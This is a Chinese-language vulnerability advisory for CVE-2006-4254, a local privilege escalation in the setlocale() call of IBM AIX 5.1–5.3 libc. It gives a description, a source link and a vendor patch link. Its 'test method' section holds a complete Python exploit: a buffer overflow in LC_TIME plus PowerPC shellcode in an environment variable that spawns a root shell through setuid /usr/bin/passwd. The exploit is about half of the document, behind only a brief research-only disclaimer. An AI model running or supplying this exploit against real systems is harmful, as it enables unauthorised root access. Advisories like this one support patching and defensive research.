IBM AIX setlocale调用本地权限提升漏洞
发布日期:2006-08-17
更新日期:2006-08-21
受影响系统:IBM AIX 5.3
IBM AIX 5.2
IBM AIX 5.1
描述:
BUGTRAQ ID:
19578
CVE(CAN) ID:
CVE-2006-4254
IBM AIX是一款商业性质的UNIX操作系统。
AIX的libc.a文件中的setlocale()调用实现上存在漏洞,本地攻击者可以利用其中的漏洞实现权限的提升。
<*来源:IBM (
ncsupp@ca.ibm.com)
链接:
http://secunia.com/advisories/21541/print/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254 )
#
thomas.pollet@gmail.com
#
from os import execve
bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f"
egg="\x60"*2350
shellcode=( # by intropy <at> caughq.org
"\x7c\xa5\x2a\x79" # xor. r5,r5,r5
"\x40\x82\xff\xfd" # bnel <shellcode>
"\x7f\xe8\x02\xa6" # mflr r31
"\x3b\xff\x01\x20" # cal r31,0x120(r31)
"\x38\x7f\xff\x08" # cal r3,-248(r31)
"\x38\x9f\xff\x10" # cal r4,-240(r31)
"\x90\x7f\xff\x10" # st r3,-240(r31)
"\x90\xbf\xff\x14" # st r5,-236(r31)
"\x88\x5f\xff\x0f" # lbz r2,-241(r31)
"\x98\xbf\xff\x0f" # stb r5,-241(r31)
"\x4c\xc6\x33\x42" # crorc cr6,cr6,cr6
"\x44\xff\xff\x02" # svca
"/bin/sh"
"\x05")
execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})
建议:
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
ftp://aix.software.ibm.com/aix/efixes/security/setlocale_ifix.tar.Z浏览次数:3199
严重程度:0(网友投票)
